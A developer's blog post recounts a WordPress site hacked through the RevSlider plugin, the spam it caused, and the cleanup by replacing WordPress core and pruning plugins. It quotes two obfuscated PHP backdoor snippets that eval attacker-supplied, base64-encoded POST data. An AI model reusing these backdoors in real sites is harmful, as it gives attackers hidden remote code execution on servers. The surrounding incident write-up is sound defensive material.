Hacked WordPress Exploit Experience

For the first time in a very long time, a website that I created was recently hacked and no, I’m not embarrassed or ashamed.

Over the past few years I’ve come to terms with the fact that I have to develop WordPress websites – as a platform its just become too ubiquitous to avoid and due to the speed with which you can develop a website using it, its also become necessary to stay competitive on price.  The truth is however – I hate WordPress from both a developer and a host point of view.

As you may have guessed, the website that was compromised was a WordPress one.  It manifested in an unusual way however – the postmaster account for our mail server suddenly started getting inundated with NDR messages for spam.  The mailserver itself didn’t show any messages queued, so I determined it must be using PHP Mail.  I found the suspect website and examined the folder structure for anything out of place.

Exploits in PHP Obfuscated Code

I immediately noticed a bunch of PHP files, all updated today and examining them found lots of obfuscated code, here’s a few snippets:

<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n95e668'])) {eval($s21(${$s20}['n95e668']));}
?>

$ZvgDGI=$sKvlvb('rin'.#HQR.
 'y');
$grlsuH = $sKvlvb('t'.#HQR.
 'mv'.#HQR.
 'asyng'.#HQR.
 'r');
$RSlZZF = $sKvlvb('bo_trg_pba'.#HQR.
 'gr'.#HQR.
 'agf');
$tyWQnB = $sKvlvb('bo_raq_pyr'.#HQR.
 'n'.#HQR.
 'a');
$BpkKGk = $sKvlvb('o'.#HQR.
 'n'.#HQR.
 'fr64_'.#HQR.
 'qr'.#HQR.
 'pbq'.#HQR.
 'r');
$ROGSmE = $sKvlvb('cer'.#HQR.
 't_ercynp'.#HQR.
 'r');
$nHUSNJ = $sKvlvb(':'.#HQR.
 ':r');
$YETBcn=$grlsuH($RSlZZF());$tyWQnB();
$ROGSmE($nHUSNJ,"$ZvgDGI($BpkKGk('$YETBcn'))"#gqwd
, "/*MCdO*/"/*NaRP*/);

An unnamed blogger reported finding the similar files here and breaks down their usage a little more.

How Did They Get There?

The thing I hated the most was not knowing how the hosting was compromised and the malicious files were uploaded.  The hack I mentioned from years ago was when SQL Injection first appeared.  I didn’t mind the hack and wrote scripts to undo the damage and to help others and it was clear as day how the penetration had occurred – this however, had me worried.

It was with some great relief and a little frustration that it turns out that a plugin called ‘Slider Revolution Responsive WordPress Plugin‘ that came bundled with a theme we had purchased was the culprit and is apparently responsible for hundreds of thousands of compromised WordPress websites (whoops).

How Did I Fix It?

While I did manage to search and delete/update all of the PHP files amended on the date of infection, I was still seeing some spam being sent through the site so it was clear that I was missing something.  To be same, the only thing I could do was to replace the WordPress core – I did this by downloading the same version of WordPress, unzipping it and overwriting everything in my WordPress folder except for wp-config.php and /wp-content/ the latter of which I thoroughly checked for suspect files then deleted all unnecessary plugins and themes.

When I reactivated the site, the website was working again but no spam (when previously, bringing up the site for just a couple of minutes resulted in hundreds of spam messages).

Why Did This Happen?

This highlights a real problem with the WordPress framework.  While WordPress itself reports updates and outdated versions, plugin and theme authors are not required to make updates available.  Most authors do because its just good business but often, plugins are bundled with themes and it seems to be these that suffer from a lack of viable update path.  You can download a new version because you haven’t bought it and if the theme author doesn’t update the theme, then you can get it through that route either.

Fortunately in the case of the RevSlider Exploit, Envato/CodeCanyon took a firm line and suspended the sales of all themes that included the RevSlider plugin until the authors submitted an update with the new plugin included: http://marketblog.envato.com/news/plugin-vulnerability/.